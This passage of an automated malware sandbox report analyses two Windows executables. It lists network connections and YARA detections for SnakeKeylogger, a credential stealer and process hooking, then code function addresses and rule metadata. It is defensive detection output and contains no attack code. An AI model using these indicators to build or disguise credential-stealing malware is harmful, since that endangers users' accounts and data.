                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003445000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49761 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7495 P.exe, DataGridViewFarsiDatePickerCell.csLarge array initialization: : array initializer size 650699
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 2_2_07BB00402_2_07BB0040
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 2_2_07BBE7902_2_07BBE790
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 2_2_07BBE34A2_2_07BBE34A
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 2_2_07BB00062_2_07BB0006
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 2_2_07BBEBD82_2_07BBEBD8
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325537013_2_03255370
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325D27813_2_0325D278
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325711813_2_03257118
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325C19F13_2_0325C19F
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325A08813_2_0325A088
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325C73813_2_0325C738
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325C46813_2_0325C468
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325CA0813_2_0325CA08
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325F97413_2_0325F974
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_032569A013_2_032569A0
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325E98813_2_0325E988
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325CFA913_2_0325CFA9
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325CCD813_2_0325CCD8
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_0325E97B13_2_0325E97B
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_032529E013_2_032529E0
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_03253E0913_2_03253E09
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F82A9013_2_06F82A90
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8966813_2_06F89668
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F81FA813_2_06F81FA8
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8185013_2_06F81850
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F89D9013_2_06F89D90
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8514813_2_06F85148
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8DAC813_2_06F8DAC8
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8DAC713_2_06F8DAC7
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8D67013_2_06F8D670
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8D66313_2_06F8D663
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8D21813_2_06F8D218
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8E7D013_2_06F8E7D0
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8E7CF13_2_06F8E7CF
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F81F9B13_2_06F81F9B
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8E37813_2_06F8E378
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8E36F13_2_06F8E36F
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F80B3013_2_06F80B30
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8DF2013_2_06F8DF20
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F80B2013_2_06F80B20
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8DF1F13_2_06F8DF1F
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8F4D813_2_06F8F4D8
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F88CC013_2_06F88CC0
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F88CB113_2_06F88CB1
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8F08013_2_06F8F080
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8F07113_2_06F8F071
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8944813_2_06F89448
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8004013_2_06F80040
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8184113_2_06F81841
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8EC2813_2_06F8EC28
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8000613_2_06F80006
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8CDC013_2_06F8CDC0
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8CDAF13_2_06F8CDAF
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8513813_2_06F85138
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8F93013_2_06F8F930
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F89D2913_2_06F89D29
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8F92113_2_06F8F921
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_04B055B614_2_04B055B6
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_04B055B814_2_04B055B8
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_04B031AC14_2_04B031AC
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_04B0AB3014_2_04B0AB30
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_04B2627814_2_04B26278
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_04B2626814_2_04B26268
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_072C004014_2_072C0040
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_072CE79014_2_072CE790
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_072CE32F14_2_072CE32F
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_072C002214_2_072C0022
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_072CEBD814_2_072CEBD8
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176C14618_2_0176C146
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176711818_2_01767118
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176A08818_2_0176A088
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176537018_2_01765370
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176D27818_2_0176D278
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176C46818_2_0176C468
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176C73818_2_0176C738
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_017669A018_2_017669A0
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176E98818_2_0176E988
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_01763B8718_2_01763B87
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176CA0818_2_0176CA08
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176CCD818_2_0176CCD8
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176CFAB18_2_0176CFAB
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176E97B18_2_0176E97B
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_0176F96118_2_0176F961
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_017629EC18_2_017629EC
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_01763AA118_2_01763AA1
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_01763E0918_2_01763E09
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF966818_2_06DF9668
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF1FA818_2_06DF1FA8
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF9D3818_2_06DF9D38
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF2A9018_2_06DF2A90
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF185018_2_06DF1850
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF514818_2_06DF5148
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFD67018_2_06DFD670
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFD66018_2_06DFD660
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFE7D018_2_06DFE7D0
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFE7CE18_2_06DFE7CE
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF1FA118_2_06DF1FA1
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFDF1E18_2_06DFDF1E
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFDF2018_2_06DFDF20
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFF4D818_2_06DFF4D8
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF8CC018_2_06DF8CC0
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFEC1818_2_06DFEC18
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFEC2818_2_06DFEC28
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFCDC018_2_06DFCDC0
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFDAC818_2_06DFDAC8
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFDAB918_2_06DFDAB9
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFD21818_2_06DFD218
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFE37818_2_06DFE378
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFE36918_2_06DFE369
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF0B3018_2_06DF0B30
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF0B2018_2_06DF0B20
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFF08018_2_06DFF080
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF184118_2_06DF1841
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF004018_2_06DF0040
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFF07118_2_06DFF071
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF000718_2_06DF0007
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF514318_2_06DF5143
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFF93018_2_06DFF930
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DFF92118_2_06DFF921
                  Source: 7495 P.exe, 00000002.00000002.1340523019.0000000003104000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs 7495 P.exe
                  Source: 7495 P.exe, 00000002.00000002.1345958521.00000000084A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 7495 P.exe
                  Source: 7495 P.exe, 00000002.00000002.1339095430.00000000011BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 7495 P.exe
                  Source: 7495 P.exe, 00000002.00000002.1340523019.0000000002EDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 7495 P.exe
                  Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 7495 P.exe
                  Source: 7495 P.exe, 00000002.00000002.1345017563.00000000078FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQPNc.exe4 vs 7495 P.exe
                  Source: 7495 P.exe, 00000002.00000002.1344806688.0000000007860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs 7495 P.exe
                  Source: 7495 P.exe, 00000002.00000000.1274186088.0000000000A6E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQPNc.exe4 vs 7495 P.exe
                  Source: 7495 P.exe, 0000000D.00000002.3727840709.0000000001357000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 7495 P.exe
                  Source: 7495 P.exeBinary or memory string: OriginalFilenameQPNc.exe4 vs 7495 P.exe
                  Source: 7495 P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
